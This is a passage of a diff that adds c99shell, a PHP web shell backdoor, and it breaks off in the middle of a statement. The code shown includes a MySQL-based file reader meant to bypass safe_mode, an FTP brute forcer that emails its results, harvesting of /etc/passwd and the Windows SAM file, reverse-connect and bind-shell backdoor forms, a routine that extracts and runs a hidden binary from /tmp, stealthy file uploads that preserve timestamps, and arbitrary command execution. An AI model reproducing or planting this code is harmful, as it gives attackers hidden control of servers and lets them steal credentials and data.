height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>FTP Brute Forcer: </b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server Information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "</br><b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><b>Encoder:</b></br></br><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><br><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br><b>Hashes</b>:</br></br>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</br><b>Url:</b><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + </br></br><b>Base64:</b></br> base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly>"; + echo "</br>base64_decode - "; + if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} + else + { + $debase64 = base64_decode($encoder_input); + $debase64 = str_replace("\0","[0]",$debase64); + $a = explode("\r\n",$debase64); + $rows = count($a); + $debase64 = htmlspecialchars($debase64); + if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} + else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} + echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>"; + } + echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; + $c = strlen($encoder_input); + for($i=0;$i<$c;$i++) + { + $hex = dechex(ord($encoder_input[$i])); + if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} + elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} + } + echo "\" readonly><br></form>"; +} +if ($act == "backc") +{ + $ip = $_SERVER["REMOTE_ADDR"]; + $msg = $_POST['backcconnmsg']; + $emsg = $_POST['backcconnmsge']; + echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>"); + echo("$msg"); + echo("$emsg"); +} + +if ($act == "shbd"){ +$msg = $_POST['backcconnmsg']; +$emsg = $_POST['backcconnmsge']; +echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST> +Bind Port: <input type='text' name='backconnectport' value='5992'> +<input type='hidden' name='use' value='shbd'> +<input type='submit' value='Install Backdoor'></form>"); +echo("$msg"); +echo("$emsg"); +} + + +if ($act == "proxy") { + cf("/tmp/hantu.tgz",$proxy_shit); + ex("cd /tmp;tar -zxvf hantu.tgz"); + ex("cd /tmp;cd .setan;chmod 777 xh"); + ex("cd /tmp;cd .setan;chmod 777 httpd"); + ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start"); + checkproxyhost(); + $msg = $_POST['proxyhostmsg']; + echo("$msg"); + unlink("/tmp/hantu.tgz"); + ex("cd /tmp; rm -r .setan"); +} + +if ($act == "selfremove") +{ + if (($submit == $rndcode) and ($submit != "")) + { + if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); } + else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} + } + else + { + if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>"; + } +} +if ($act == "search"){ + echo "<b>Search file-system:</b></br></br>"; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) + { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array + ( + "name"=>$search_name, "name_regexp"=>$search_name_regexp, + "text"=>$search_text, "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {c99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "<b>No files found!</b>";} + else + { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "<form method=POST> +<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> +<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp +<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> +<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text)."> + +<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive +&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text +<br><br><input type=submit name=submit value=\"Search\"></form>"; + if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} +} +if ($act == "chmod") +{ + $mode = fileperms($d.$f); + if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} + else + { + $form = TRUE; + if ($chmod_submit) + { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) + { + $perms = parse_perms($mode); + echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; + } + } +} +if ($act == "upload") +{ + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} + if (!empty($submit)) + { + global $HTTP_POST_FILES; + $uploadfile = $HTTP_POST_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) + { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=submit name=submit value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + } + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + $act = "ls"; +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) + { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = myshellexec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") +{ +if (trim($cmd) == "ps aux") {$act = "processes";} +elseif (trim($cmd) == "tasklist") {$act = "processes";} +else +{ + @chdir($chdir); + if (!empty($submit)) + { + $execcmd = $_REQUEST['cmd']; + echo "Result Of Locally Executed Command: <b>$execcmd</b></br>"; + $olddir = realpath("."); + @chdir($d); + $ret = 